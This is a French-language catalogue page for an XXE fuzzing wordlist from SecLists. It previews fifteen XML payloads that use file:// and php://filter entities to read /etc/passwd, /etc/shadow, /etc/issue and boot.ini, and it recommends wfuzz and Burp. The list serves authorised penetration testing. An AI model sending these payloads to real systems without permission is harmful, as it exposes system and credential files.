XXE Fuzzing
Payloads d'entités externes XML (XXE) incluant des déclarations DOCTYPE/ENTITY pour la divulgation de fichiers via les wrappers file:// et php://filter. Pour tester la sensibilité des parseurs XML aux XXE.
- Taille
- 4.8 KB
- Catégorie
- Fuzzing
- Source
- danielmiessler/SecLists
- Licence
- MIT
- Outils recommandés
- wfuzzburp
Aperçu
Les 15 premières entrées. Téléchargez ou copiez la liste complète (4.8 KB) avec les boutons ci-dessus.
<!ENTITY % xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd" > <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]> <!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]><root>&foo;</root> <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]> <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE xxe [<!ENTITY foo "aaaaaa">]><root>&foo;</root> <?xml version="1.0" encoding="ISO-8859-1"?><test></test> <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo> <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/issue" >]><foo>&xxe;</foo> <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/issue" >]> <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo> <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/shadow" >]> <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo> <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]>
Payloads d'entités externes XML (XXE) incluant des déclarations DOCTYPE/ENTITY pour la divulgation de fichiers via les wrappers file:// et php://filter. Pour tester la sensibilité des parseurs XML aux XXE.
Cette liste est orientée vers le fuzzing d'entrées et la découverte de vulnérabilités. Elle pèse environ 4.8 KB et s'associe bien avec des outils tels que wfuzz, burp. Choisissez la plus petite liste adaptée à votre mission : les listes plus courtes sont plus rapides et plus discrètes pour les attaques en ligne, tandis que les listes plus volumineuses offrent une couverture plus large pour le travail hors ligne où la vitesse est moins contraignante.
Vous pouvez copier l'aperçu d'exemple directement depuis cette page, copier la liste entière dans
votre presse-papiers, ou télécharger le fichier .txt brut. La liste complète est servie directement
depuis sa source d'origine sur GitHub.
Provient de danielmiessler/SecLists et distribuée sous licence MIT. N'utilisez les wordlists que contre des systèmes que vous êtes explicitement autorisé à tester.